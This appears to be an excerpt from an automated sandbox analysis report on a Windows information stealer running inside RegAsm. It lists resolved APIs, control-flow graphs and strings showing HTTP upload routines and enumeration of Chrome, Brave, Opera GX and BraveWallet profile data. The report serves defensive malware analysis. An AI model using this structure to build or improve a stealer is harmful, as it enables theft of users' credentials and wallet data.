                                                                                    • GetProcAddress.KERNEL32 ref: 0041783C
                                                                                    • GetProcAddress.KERNEL32 ref: 00417853
                                                                                    • GetProcAddress.KERNEL32 ref: 0041786A
                                                                                    • GetProcAddress.KERNEL32 ref: 00417881
                                                                                    • GetProcAddress.KERNEL32 ref: 00417898
                                                                                    • GetProcAddress.KERNEL32 ref: 004178AF
                                                                                    • GetProcAddress.KERNEL32 ref: 004178C6
                                                                                    • GetProcAddress.KERNEL32 ref: 004178DD
                                                                                    • GetProcAddress.KERNEL32 ref: 004178F4
                                                                                    • GetProcAddress.KERNEL32 ref: 0041790B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417922
                                                                                    • GetProcAddress.KERNEL32 ref: 00417939
                                                                                    • GetProcAddress.KERNEL32 ref: 00417950
                                                                                    • GetProcAddress.KERNEL32 ref: 00417967
                                                                                    • GetProcAddress.KERNEL32 ref: 0041797E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417995
                                                                                    • GetProcAddress.KERNEL32 ref: 004179AC
                                                                                    • GetProcAddress.KERNEL32 ref: 004179C3
                                                                                    • GetProcAddress.KERNEL32 ref: 004179DA
                                                                                    • GetProcAddress.KERNEL32 ref: 004179F1
                                                                                    • GetProcAddress.KERNEL32 ref: 00417A08
                                                                                    • GetProcAddress.KERNEL32 ref: 00417A1F
                                                                                    • LoadLibraryA.KERNEL32(00416AAC,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064,004135E9,00413626,?,00000024,00000064,Function_000135AC,00413295), ref: 00417A30
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A41
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A52
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A63
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A74
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A85
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A96
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417AA7
                                                                                    • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417AB7
                                                                                    • GetProcAddress.KERNEL32(75290000), ref: 00417AD2
                                                                                    • GetProcAddress.KERNEL32 ref: 00417AE9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B00
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B17
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B2E
                                                                                    • GetProcAddress.KERNEL32(73B50000), ref: 00417B4D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B64
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B7B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B92
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BA9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BC0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BD7
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BEE
                                                                                    • GetProcAddress.KERNEL32(752C0000), ref: 00417C09
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C20
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C37
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C4E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C65
                                                                                    • GetProcAddress.KERNEL32(74EC0000), ref: 00417C84
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C9B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CB2
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CC9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CE0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CF7
                                                                                    • GetProcAddress.KERNEL32(75BD0000), ref: 00417D16
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D2D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D44
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D5B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D72
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D89
                                                                                    • GetProcAddress.KERNEL32 ref: 00417DA0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417DB7
                                                                                    • GetProcAddress.KERNEL32 ref: 00417DCE
                                                                                    • GetProcAddress.KERNEL32(75A70000), ref: 00417DE9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E00
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E17
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E2E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E45
                                                                                    • GetProcAddress.KERNEL32(75450000), ref: 00417E60
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E77
                                                                                    • GetProcAddress.KERNEL32(75DA0000), ref: 00417E92
                                                                                    • GetProcAddress.KERNEL32 ref: 00417EA9
                                                                                    • GetProcAddress.KERNEL32(6F090000), ref: 00417EC8
                                                                                    • GetProcAddress.KERNEL32 ref: 00417EDF
                                                                                    • GetProcAddress.KERNEL32 ref: 00417EF6
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F0D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F24
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F3B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F52
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F69
                                                                                    • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
                                                                                    • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
                                                                                    • GetProcAddress.KERNEL32(75AF0000), ref: 00417FB0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417FC7
                                                                                    • GetProcAddress.KERNEL32 ref: 00417FDE
                                                                                    • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                                    • GetProcAddress.KERNEL32(75D90000), ref: 00418010
                                                                                    • GetProcAddress.KERNEL32(6CC10000), ref: 0041802B
                                                                                    • GetProcAddress.KERNEL32 ref: 00418042
                                                                                    • GetProcAddress.KERNEL32 ref: 00418059
                                                                                    • GetProcAddress.KERNEL32 ref: 00418070
                                                                                    • GetProcAddress.KERNEL32(6CA20000,SymMatchString), ref: 0041808A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                    • API String ID: 2238633743-951535364
                                                                                    • Opcode ID: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
                                                                                    • Instruction ID: b1e844fb62b820e65f219bf097f7cac9561447c547020423e5517cd844e2ca6b
                                                                                    • Opcode Fuzzy Hash: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
                                                                                    • Instruction Fuzzy Hash: 3D42D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54
                                                                                    Function 0040514C Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 640networkstringmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 605 40514c-40521b _EH_prolog call 40f95a call 403a54 call 40f923 * 5 call 40fb4d InternetOpenA StrCmpCA 622 40521d 605->622 623 40521f-405222 605->623 622->623 624 4058d8-4058fe InternetCloseHandle call 40fb4d call 406242 623->624 625 405228-4053a6 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 623->625 634 405900-40592d call 40f997 call 40fa9c call 40f9e1 call 40f98e 624->634 635 405932-40599f call 410a94 * 2 call 40f98e * 4 call 401061 call 40f98e 624->635 625->624 705 4053ac-4053dd HttpOpenRequestA 625->705 634->635 706 4053e3-4053e5 705->706 707 4058cf-4058d2 InternetCloseHandle 705->707 708 4053e7-4053f7 InternetSetOptionA 706->708 709 4053fd-405875 call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA 706->709 707->624 708->709 868 4058b1-4058c6 InternetReadFile 709->868 869 405877-40587c 868->869 870 4058c8-4058c9 InternetCloseHandle 868->870 869->870 871 40587e-4058ac call 40fa9c call 40f9e1 call 40f98e 869->871 870->707 871->868
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00405151
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425B20,00000000), ref: 004057CC
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                                    • memcpy.MSVCRT ref: 00405810
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                                    • memcpy.MSVCRT ref: 00405843
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                                    • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                                    • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                    • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                                    • API String ID: 2237346945-1447386369
                                                                                    • Opcode ID: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
                                                                                    • Instruction ID: b4e14776caadebfe53afa945c4bf6ce093965098b883e79db6b3ac6117d29439
                                                                                    • Opcode Fuzzy Hash: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
                                                                                    • Instruction Fuzzy Hash: 6D425EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DB781B4CCB65
                                                                                    Function 0040C679 Relevance: 44.7, APIs: 19, Strings: 6, Instructions: 924fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1469 40c679-40c72b _EH_prolog call 40f923 call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 2 call 40f923 * 2 call 40fb4d FindFirstFileA 1488 40c772-40c778 1469->1488 1489 40c72d-40c76d call 40f98e * 3 call 401061 call 40f98e 1469->1489 1490 40c77a-40c78e StrCmpCA 1488->1490 1520 40d3d4-40d3f9 call 40f98e * 2 1489->1520 1492 40d374-40d386 FindNextFileA 1490->1492 1493 40c794-40c7a8 StrCmpCA 1490->1493 1492->1490 1495 40d38c-40d3d1 FindClose call 40f98e * 3 call 401061 call 40f98e 1492->1495 1493->1492 1496 40c7ae-40c83a call 40f997 call 40fa28 call 40fa9c * 2 call 40f9e1 call 40f98e * 3 1493->1496 1495->1520 1536 40c840-40c859 call 40fb4d StrCmpCA 1496->1536 1537 40c99f-40ca34 call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1496->1537 1543 40c8ff-40c99a call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1536->1543 1544 40c85f-40c8fa call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1536->1544 1584 40ca3a-40ca5c call 40f98e call 40fb4d StrCmpCA 1537->1584 1543->1584 1544->1584 1595 40ca62-40ca76 StrCmpCA 1584->1595 1596 40cc7b-40cc90 StrCmpCA 1584->1596 1595->1596 1597 40ca7c-40cbf5 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 call 40f923 call 40fa9c * 2 call 40f9e1 call 40f98e * 2 call 40f95a call 40618b 1595->1597 1598 40cc92-40ccf5 call 4010b1 call 40f95a * 3 call 40c27b 1596->1598 1599 40cd05-40cd1a StrCmpCA 1596->1599 1806 40cc44-40cc76 call 40fb4d call 40fb14 call 40fb4d call 40f98e * 2 1597->1806 1807 40cbf7-40cc3f call 40f95a call 4010b1 call 414437 call 40f98e 1597->1807 1654 40ccfa-40cd00 1598->1654 1600 40cd96-40cdb1 call 40f95a call 410cdd 1599->1600 1601 40cd1c-40cd33 call 40fb4d StrCmpCA 1599->1601 1626 40ce37-40ce4c StrCmpCA 1600->1626 1627 40cdb7-40cdba 1600->1627 1613 40d2e3-40d2ea 1601->1613 1614 40cd39-40cd3c 1601->1614 1617 40d364-40d36f call 40fb14 * 2 1613->1617 1618 40d2ec-40d359 call 40f95a * 2 call 40f923 call 4010b1 call 40c679 1613->1618 1614->1613 1620 40cd42-40cd94 call 4010b1 call 40f95a * 2 1614->1620 1617->1492 1687 40d35e 1618->1687 1666 40ce15-40ce27 call 40f95a call 406737 1620->1666 1632 40d0d0-40d0e5 StrCmpCA 1626->1632 1633 40ce52-40cf43 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 1626->1633 1627->1613 1635 40cdc0-40ce12 call 4010b1 call 40f95a call 40f923 1627->1635 1632->1613 1643 40d0eb-40d1dc call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 1632->1643 1748 40d027-40d040 call 40fb4d StrCmpCA 1633->1748 1749 40cf49-40d021 call 4010b1 call 40f95a * 3 call 406e2a call 4010b1 call 40f95a * 3 call 407893 1633->1749 1635->1666 1754 40d2c0-40d2d2 call 40fb4d DeleteFileA call 40fb14 1643->1754 1755 40d1e2-40d246 call 4010b1 call 40f95a * 3 call 4071c6 1643->1755 1654->1613 1688 40ce2c-40ce32 1666->1688 1687->1617 1688->1613 1763 40d0b1-40d0c3 call 40fb4d DeleteFileA call 40fb14 1748->1763 1764 40d042-40d0ab call 4010b1 call 40f95a * 3 call 407ec7 1748->1764 1749->1748 1774 40d2d7 1754->1774 1805 40d24b-40d2ba call 4010b1 call 40f95a * 3 call 4074e2 1755->1805 1789 40d0c8-40d0cb 1763->1789 1764->1763 1781 40d2da-40d2de call 40f98e 1774->1781 1781->1613 1789->1781 1805->1754 1806->1596 1807->1806
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C67E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00425BD3,00425BD2,00000000,?,00425D1C,?,?,00425BCF,?,?,00000000), ref: 0040C71F
                                                                                    • StrCmpCA.SHLWAPI(?,00425D20,?,?,00000000), ref: 0040C786
                                                                                    • StrCmpCA.SHLWAPI(?,00425D24,?,?,00000000), ref: 0040C7A0
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425D28,?,?,00425BD6,?,?,00000000), ref: 0040C851
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                    • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                    • API String ID: 3869166975-1816240570
                                                                                    • Opcode ID: 6ef869c5acf4193e10be2cf9d0355ff0e5442593db8ce554f40d3e93bb02fcfc
                                                                                    • Instruction ID: 7e6182c7e919ebae31536edbd22d10e843a74c74831f1e41d64d485d49d03601
                                                                                    • Opcode Fuzzy Hash: 6ef869c5acf4193e10be2cf9d0355ff0e5442593db8ce554f40d3e93bb02fcfc
                                                                                    • Instruction Fuzzy Hash: 3A826070900288EADF25EBA5C955BDDBBB4AF19304F5040BEE449B32C2DB78174DCB66
                                                                                    Function 004153F6 Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 316stringfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1847 4153f6-415469 _EH_prolog call 4181c0 wsprintfA FindFirstFileA memset * 2 1850 41581b-415835 call 401061 1847->1850 1851 41546f-415483 StrCmpCA 1847->1851 1852 415489-41549d StrCmpCA 1851->1852 1853 4157fa-41580c FindNextFileA 1851->1853 1852->1853 1855 4154a3-4154df wsprintfA StrCmpCA 1852->1855 1853->1851 1856 415812-415815 FindClose 1853->1856 1858 4154e1-4154f9 wsprintfA 1855->1858 1859 4154fb-41550a wsprintfA 1855->1859 1856->1850 1860 41550d-41553e memset lstrcat 1858->1860 1859->1860 1861 415561-41556b strtok_s 1860->1861 1862 415540-415551 1861->1862 1863 41556d-4155a1 memset lstrcat 1861->1863 1868 415785-41578b 1862->1868 1871 415557-415560 1862->1871 1864 4156e1-4156eb strtok_s 1863->1864 1865 4156f1 1864->1865 1866 4155a6-4155b6 PathMatchSpecA 1864->1866 1865->1868 1869 4156d7-4156e0 1866->1869 1870 4155bc-4156bb call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 3 call 410f12 call 418360 1866->1870 1868->1853 1872 41578d-415799 1868->1872 1869->1864 1915 4156f6-415705 1870->1915 1916 4156bd-4156d2 call 40fb4d call 40f98e 1870->1916 1871->1861 1872->1856 1874 41579b-4157a3 1872->1874 1874->1853 1876 4157a5-4157ef call 4010b1 call 4153f6 1874->1876 1884 4157f4 1876->1884 1884->1853 1917 415836-415841 call 40f98e 1915->1917 1918 41570b-41572e call 40f95a call 40618b 1915->1918 1916->1869 1917->1850 1929 415730-415775 call 40f923 call 4010b1 call 414437 call 40f98e 1918->1929 1930 41577a-415780 call 40f98e 1918->1930 1929->1930 1930->1868
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004153FB
                                                                                    • wsprintfA.USER32 ref: 00415421
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                    • memset.MSVCRT ref: 0041544F
                                                                                    • memset.MSVCRT ref: 0041545D
                                                                                    • StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
                                                                                    • StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
                                                                                    • wsprintfA.USER32 ref: 004154B9
                                                                                    • StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
                                                                                    • wsprintfA.USER32 ref: 004154F0
                                                                                    • wsprintfA.USER32 ref: 00415504
                                                                                    • memset.MSVCRT ref: 00415516
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                    • strtok_s.MSVCRT ref: 00415561
                                                                                    • memset.MSVCRT ref: 00415576
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                                    • strtok_s.MSVCRT ref: 004156E1
                                                                                    • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
